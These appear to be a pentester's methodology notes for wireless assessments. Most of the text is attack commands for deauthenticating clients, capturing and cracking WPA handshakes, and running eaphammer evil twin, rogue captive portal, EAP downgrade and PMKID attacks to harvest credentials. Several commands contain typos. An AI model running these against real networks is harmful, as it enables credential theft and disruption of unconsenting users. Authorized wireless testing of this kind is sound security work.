Wireless Testing Methodology
special driver setup
captive portals
- check if you see other MAC addresses and if they work
- check if there is client separation (prior to authentication)
what are you expected to do?
- assessment of a wireless networK?
- WPA2 Enterprise
what to do
- evalutate strength of PSK
- review nearby networks
- assessing guest network
- chekcing network access
$ airmon-ng check kill
$ airmon-ng start wlan0
$ iwconfig # -> check if there is a monitor mode
$ airodump-ng wlan0mon #`` check for networks
$ airodump-ng -c 6 --bssid bssid -w capture wlan0mon
# add deauth-attack to gather more handshakes
$ aireplay-ng -0 1 -a <access point essid> -c <client mac> wlan0mon
#crack those hashes
$ aircrack-ng -w <wordlist> -b <ap mac address> <capture-file>
introduction posts to read:
- uses hostapd-wpe
- rogue ap attack
- attack WIFI techniques, not fake AP
EAPHammer Posts
- https://medium.com/@s0lst1c3
- https://github.com/s0lst1c3/s0lst1c3.github.io/blob/master/workshops/advanced-wireless-attacks/index.md
- https://github.com/s0lst1c3/eaphammer/wiki/VI.-Attacking-802.11n-Networks
- https://github.com/s0lst1c3/eaphammer/wiki
- rogue AP to install implants
- evil twin to attack wpa/2 eap/psk networks
# to attack psk network and get credentials
$ eaphammer -i wlan0 -e exampleCorp -c 1 --creds --auth wpa-psk
# to get credentials
$ eaphammer -i wlan0 -e exampleCorp --pmf enable --cloaking full --mana --auth wpa-eap --creds --mac-whitelist devices.txt --ssid-whitelist target.txt
$ for i in `cat devices.txt`; do aireplay-ng -0 5 -a xx -c $i; done
initial attacks
# create a fake captive portal
$ eaphammer -i wlan0 --essid exampleCorp --captive-portal
# deauth clients
$ nmcli device set wlan0 managed off
$ ifconfig wlan1 down
$ iwconfig wlan1 mode monitor
$ ifconfig wlan1 up
$ iwconfig wlan1 channel 1
$ aireplay-ng -0 0 -a xx -c xx wlan1
attacking active probing
Also known as Karma/Mana style attacks. Karma-style attacks are not supported by eaphammer anymore.
More or less the AP will answer to any incoming AP connection request.
# simple attack against macs in macstoattack.txt
$ eaphammer -i wlan0 -e seemslegit --cloaking full --captive-portal --mana --mac-whiteliste macstoattack.txt
# loud mode attack (assumes that PNL of nearby device intersects)
# add the `--loud` flag to respond with all essids
# known beacon: uses a wordlist for known essids
$ eaphammer -i wlan0 --mana -e apples --known-beacons --captive-portal --knwon-ssids oranges
# or: --known-ssids-file words.txt
# known beacon burst attacks will directly attack a single client
# 1. start epahammer with --mana
# 2. forge beacons to a client
$ forge-beacons -i wlan1 --bssid xx --known-essids-file know_ssids.txt --dst-adr xxx --burst-count 5
use managment frame ACLs for more targeted attacks
, --mac-blacklist
, --ssid-whitelist
, --ssid-blacklist
attacking WPA3/OWE
- opportunistic wireless encryption
- authentication vs. encryption → this is why we have open wireless networks still
- OWE adds encryption (through DH) to open networks
- OWE transition mode: 2 networks, 1 visible open network with link to OWE network in broadcast parameters, one hidden OWE network
- OWE only helps against passive sniffing attacks, not against evil-twin attacks (as there is no authentication)
eap attacks
# create new self-signed certificate
$ eaphammer --cert-wizard
# start the capture
$ eaphammer --bssid xx --essid networkname --channel 2 --wpa 2 --auth wpa-eap --interface wlan0 --creds
# use captured credentials to crack radius credentials
$ asleap -C challenge -R response -W wordlist
# perform downgrade attacks with `--eapdowngrade full` or `eap-downgrade gtc`
# use autoamtic cracking with `--autocrack`
hostile captive portal
# tries to get windows hashes
$ eaphammer --bssid xx -essid evilcrop --channel 6 --auth wpa-eap --hostile-portal
PMKID attack
$ eaphammer --pmkid --interface wlan0 --essid target
essid stripping
# try to force password re-entry
$ eaphammer -i wlan0 --auth wpa-eap --essid wifiAP --creds --negotiate balanced --essid-stripping '\r'
--hw-mode n
, together with --channel-width 20/40
. Channel bonding will automatically used if channel width=40, otherwise can be configured through --th40 plus/minus/auto
other tools
- airmaggedon
- eaphammer